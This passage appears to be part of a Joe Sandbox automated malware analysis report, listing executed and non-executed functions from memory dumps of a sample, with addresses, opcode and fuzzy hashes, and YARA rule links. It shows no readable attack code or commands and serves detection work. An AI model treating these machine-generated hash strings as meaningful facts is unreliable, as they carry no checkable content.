                                                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                Function 0091FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 8 91fd8c-91fda4 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                Function 0091FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 9 91fdc0-91fdd5 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                Function 0091FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 10 91fea0-91feb5 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                Function 0091FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 11 91fed0-91fee5 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                Function 0091FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 12 91ffb4-91ffc9 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                Function 0041B0D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: h
                                                                                • API String ID: 0-2439710439
                                                                                • Opcode ID: 8028b2b1eed58ae408a2a2206ba74fd4f24490b7df0310c84f5d6ea04bc6b6d7
                                                                                • Instruction ID: b09c97ad92f38dd907b94f94b40e9d9251748665e79d3d514d3e5dba3ff6f6ee
                                                                                • Opcode Fuzzy Hash: 8028b2b1eed58ae408a2a2206ba74fd4f24490b7df0310c84f5d6ea04bc6b6d7
                                                                                • Instruction Fuzzy Hash: 7951E571A00209ABDB24DF65DC81AEFB7F9EF49304F00455EE80597741EB34EA4587E9
                                                                                Function 0041BB70 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (
                                                                                • API String ID: 0-3887548279
                                                                                • Opcode ID: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                • Instruction ID: 39120f31cb994185fa0c0c6b21bf0f3a25baef4909208558378fadfbf7b8d04a
                                                                                • Opcode Fuzzy Hash: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                • Instruction Fuzzy Hash: 42215170600105ABCB18CF5ADC80DAB77AAEFC4714714C19AE8098B706E738ED91CBE4
                                                                                Function 0041B290 Relevance: .1, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eee836db98457e1a1fc15c982b245ce79de38a4e21484a3cfdb16524bc8b6edd
                                                                                • Instruction ID: 60665edb089a4da5b7c7183c523ff1e9e65292fa4df177ff76d86402c6307b05
                                                                                • Opcode Fuzzy Hash: eee836db98457e1a1fc15c982b245ce79de38a4e21484a3cfdb16524bc8b6edd
                                                                                • Instruction Fuzzy Hash: 21110A716442087BE220DAA6DC82FEB73DCDF49704F00055EF918CB281E7A5BE9543E9
                                                                                Function 0041BFA7 Relevance: .1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c98e3c9178eb47e451a137275a6f671eea8e511da12b2085ec6db11e32527697
                                                                                • Instruction ID: 009ab7c3280bec392b6566a58d73300905074bd05481c1749b44bc7888af9573
                                                                                • Opcode Fuzzy Hash: c98e3c9178eb47e451a137275a6f671eea8e511da12b2085ec6db11e32527697
                                                                                • Instruction Fuzzy Hash: 3201883674111437C620555ADC09FDBAB59CFC1B64F19012AFE0CDB341E3689D9286E9
                                                                                Function 0041B580 Relevance: .0, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6ffca3f4a79742ed63945bcfd2ff7396b609a1e81aac850e4fd37097c3dab7f6
                                                                                • Instruction ID: 7a4104d9939bcb4b597ff493a1a2799e53c5cb17d71d9ac4b0ab84d4e6aeca4c
                                                                                • Opcode Fuzzy Hash: 6ffca3f4a79742ed63945bcfd2ff7396b609a1e81aac850e4fd37097c3dab7f6
                                                                                • Instruction Fuzzy Hash: EB01627290030C66DB14EBA1CC82FEF773D9B44704F00459EB7496B0C2E679A698CBE5
                                                                                Function 0041B28B Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 536bfb5c9fe8166ac54ec5bd66093c399c6d8ef141dad6f9109ffea512c8d65d
                                                                                • Instruction ID: 060a2e8ee848f258523e02934bf7b4969daa03c852217821cb3e46b96727d729
                                                                                • Opcode Fuzzy Hash: 536bfb5c9fe8166ac54ec5bd66093c399c6d8ef141dad6f9109ffea512c8d65d
                                                                                • Instruction Fuzzy Hash: 36E09B716842097AF71099AA9D82FE7639CDB49315F00005AFA08EB2C1D6B95D9143F9
                                                                                Function 0041BD60 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                • Instruction ID: d1fd070bbf88014ce5866d8e9a2340663cc67632aee183b35952e701bc64936e
                                                                                • Opcode Fuzzy Hash: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                • Instruction Fuzzy Hash: D9E0EDB661430EAF9B04CE69EC42DAB37ACEB58254B04451AFC09C3200F630F9208BA1
                                                                                Function 0041BF70 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                • Instruction ID: f80eb62960a15a7d5f41cf81be893b47fb45bed63b3c1afc34f5a7c090dbc8ec
                                                                                • Opcode Fuzzy Hash: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                • Instruction Fuzzy Hash: 51E0863670121437C624659ADC06FD7B75CCBC5F60F09002AFE0CDB341E6A8AD5186E9
                                                                                Function 0041BD20 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                • Instruction ID: 3d58cd350d075d132c88aa557a1f3abf0778a86d447348b6511e6b39d7f70c69
                                                                                • Opcode Fuzzy Hash: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                • Instruction Fuzzy Hash: 08F0AC75510209AFDB04CF59C881EDB73A9EB88750F04C519FD19CB641E774EA10CBA1
                                                                                Function 0041B950 Relevance: .0, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6657ac5bc3004f505b1b1dbf5b142111d5f788b7fdca47ba48cffe40e00d809
                                                                                • Instruction ID: 595b478891ae7886c80280d34563c59e0c071687cb159ecff06bf4317a5bb1f4
                                                                                • Opcode Fuzzy Hash: d6657ac5bc3004f505b1b1dbf5b142111d5f788b7fdca47ba48cffe40e00d809
                                                                                • Instruction Fuzzy Hash: FEE09B719103085AF764F774DD4BFD9737C9B04308F4007D9BA0CA61C2FB7956554A95
                                                                                Function 0041BDA0 Relevance: .0, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                • Instruction ID: 4317296fd11b088f71e2f314a2f93ad5a54475706daa7c2690f57de3ebcf6d3a
                                                                                • Opcode Fuzzy Hash: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                • Instruction Fuzzy Hash: C7C080755003087FD700DF8CDC46F5533DC9708614F054044B90C8B342D570FD508755
                                                                                Function 0041F140 Relevance: .0, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ce289c407a8a919e9cbd3984d4173a8f7626d755ebd6694e2d49b2df59896648
                                                                                • Instruction ID: f968251e49c839e4cb1a6ecd046f32c58005516b4dbc214b92541711b8784665
                                                                                • Opcode Fuzzy Hash: ce289c407a8a919e9cbd3984d4173a8f7626d755ebd6694e2d49b2df59896648
                                                                                • Instruction Fuzzy Hash: B3A022B0C8830E03002030FA2A03023BB0CC000008F0003EBAE8C022023C02A83200EB

                                                                                Non-executed Functions

                                                                                Function 00910080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: [Pj
                                                                                • API String ID: 0-2289356113
                                                                                • Opcode ID: dd117009e40305c4442b519255e1793c5efb1778969ab00286dd97076fc83a86
                                                                                • Instruction ID: a825bed8d58ae5fd6d8e1457751c9c2365e6b274cc5fed22bdf80c6bc434090c
                                                                                • Opcode Fuzzy Hash: dd117009e40305c4442b519255e1793c5efb1778969ab00286dd97076fc83a86
                                                                                • Instruction Fuzzy Hash: 3EF06231304208ABD7119A10CD85F6A7BA9AFD9754F14C858F4455A093C7B78891D721
                                                                                Function 009326F8 Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                • Instruction ID: 255d2f1df3508891b1da3aa24b2bf372da9c970738ce58bea6260cca6cfd0b0b
                                                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                • Instruction Fuzzy Hash: 90F0C231328159EBDB48EB189D5576A73D9FB94300F54C439ED4ACB245E635FD408A90
                                                                                Function 00970101 Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                • Instruction ID: 5ec72997bb8b38b283ccabd5a8efba5f0627eb645be48a31d6e7ad6c15548e09
                                                                                • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                • Instruction Fuzzy Hash: 25F05E73244205DFCB1CCF04C490BB977A6AB80719F64842CE50F8F690D7399841CA54
                                                                                Function 009100EA Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
